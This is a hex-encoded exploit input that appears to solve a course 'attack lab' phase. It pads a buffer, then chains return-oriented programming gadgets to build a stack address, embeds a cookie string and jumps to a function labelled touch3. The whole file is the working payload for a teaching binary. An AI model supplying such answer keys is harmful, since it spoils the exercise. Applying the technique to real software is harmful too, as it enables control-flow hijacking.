31 31 31 31 /* padding */
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31
31 31 31 31 
/* $rsi=0xa 10 */
06 1a 40 00 /* gadget movq %rsp,%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
cc 19 40 00 /* gadget popq %rax */
00 00 00 00
35 39 62 39 /* the string */
39 37 66 61
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
d6 19 40 00 /* gadget lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* gadget movq %rax,%rdi */
00 00 00 00
fa 18 40 00 /* touch3 */
00 00 00 00
